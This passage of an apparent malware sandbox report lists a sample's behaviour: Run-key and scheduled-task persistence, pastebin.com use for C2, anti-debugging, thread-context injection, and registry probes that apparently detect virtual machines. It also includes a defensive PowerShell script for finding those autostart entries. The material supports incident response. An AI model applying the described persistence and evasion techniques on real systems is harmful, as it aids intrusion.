| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\8SgVdVfj\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| N/A | N/A | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4164 set thread context of 4612 | N/A | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe |
| PID 5700 set thread context of 5740 | N/A | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
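The persistence evidence in this report is spread over four tables: the Active Setup keys under "Boot or Logon Autostart Execution", win_update.vbs under "Drops startup file", the three HKCU Run values under "Adds Run key to start application", and the .job files in C:\Windows\Tasks above. Two points a responder needs when checking another host: the HKCU Installed Components keys that explorer.exe created are the per-user "already executed" markers that Windows writes at logon, and the entry that actually runs at the next logon is a StubPath value under the HKLM Installed Components key, which this report does not list; and .job files in C:\Windows\Tasks are the legacy task format produced through the old Task Scheduler interface, with the command path stored as a length-prefixed UTF-16 string. The script below is an added example for this page, not output of the sandbox or code from any family named in the report; it enumerates those four locations and flags entries that resolve into user-writable directories. The directory list, the script-extension list and the .job parsing regex are this example's assumptions. Run it in an elevated PowerShell on the host under investigation.

```powershell
# Added example: enumerate the four autostart locations this sample used and
# flag entries that point into user-writable paths.

$SuspiciousRoots = '\AppData\Local\Temp\', '\AppData\Roaming\', '\ProgramData\', '\Users\Public\'
$ScriptExtensions = '.vbs', '.js', '.jse', '.wsf', '.cmd', '.bat', '.ps1', '.hta', '.lnk'

function Test-SuspiciousPath {
    param([string]$Path)
    if ([string]::IsNullOrWhiteSpace($Path)) { return $false }
    foreach ($root in $SuspiciousRoots) {
        if ($Path -like "*$root*") { return $true }
    }
    return $false
}

$findings = [System.Collections.Generic.List[object]]::new()

function Add-Finding {
    param([string]$Source, [string]$Name, [string]$Value, [switch]$ForceSuspicious)
    $findings.Add([pscustomobject]@{
        Source     = $Source
        Name       = $Name
        Value      = $Value
        Suspicious = $ForceSuspicious.IsPresent -or (Test-SuspiciousPath $Value)
    })
}

# 1. Run keys. The report shows HKCU values named after the dropped binaries
#    (0389b600fa.exe, am_no.cmd, Anubis); HKLM and the WOW6432Node view are
#    checked as well because a second stage may escalate.
$runKeys = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $item = Get-Item $key
    foreach ($name in $item.GetValueNames()) {
        Add-Finding -Source $key -Name $name -Value ([string]$item.GetValue($name))
    }
}

# 2. Active Setup. Only HKLM StubPath values execute at logon; the HKCU keys
#    seen in the report are the per-user completion markers.
$asRoots = 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components',
           'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components'
foreach ($root in $asRoots) {
    if (-not (Test-Path $root)) { continue }
    foreach ($component in Get-ChildItem $root) {
        $stub = [string]$component.GetValue('StubPath')
        if ($stub) { Add-Finding -Source $root -Name $component.PSChildName -Value $stub }
    }
}

# 3. Per-user Startup folders (win_update.vbs in the report). Every file here
#    already lives under AppData, so flag on script extension instead of path.
$startupGlob = 'C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*'
foreach ($f in Get-ChildItem $startupGlob -File -ErrorAction SilentlyContinue) {
    $isScript = $ScriptExtensions -contains $f.Extension.ToLowerInvariant()
    Add-Finding -Source 'StartupFolder' -Name $f.Name -Value $f.FullName -ForceSuspicious:$isScript
}

# 4. Legacy .job files (Gxtuum.job, rapes.job, Test Task17.job in the report).
#    Strings in the .job format are UTF-16 at even offsets, so decoding the
#    whole file as Unicode and pulling the first drive-letter path recovers
#    the application name without a full parser.
foreach ($job in Get-ChildItem 'C:\Windows\Tasks\*.job' -File -ErrorAction SilentlyContinue) {
    $text = [System.Text.Encoding]::Unicode.GetString([System.IO.File]::ReadAllBytes($job.FullName))
    $m = [regex]::Match($text, '[A-Za-z]:\\[^\x00]{3,260}')
    $cmd = if ($m.Success) { $m.Value } else { '<unparsed>' }
    Add-Finding -Source 'C:\Windows\Tasks' -Name $job.Name -Value $cmd
}

$findings | Sort-Object Suspicious -Descending | Format-Table -AutoSize -Wrap
"Suspicious entries: $(@($findings | Where-Object Suspicious).Count)"
```

Entries whose value points into Temp, Roaming or ProgramData are not malicious by themselves (some legitimate updaters live there), but in combination with the names and paths in this report they are what to compare against. Modern scheduled tasks live as XML under C:\Windows\System32\Tasks and are not covered by step 4; Get-ScheduledTask covers those.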
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\0389b600fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
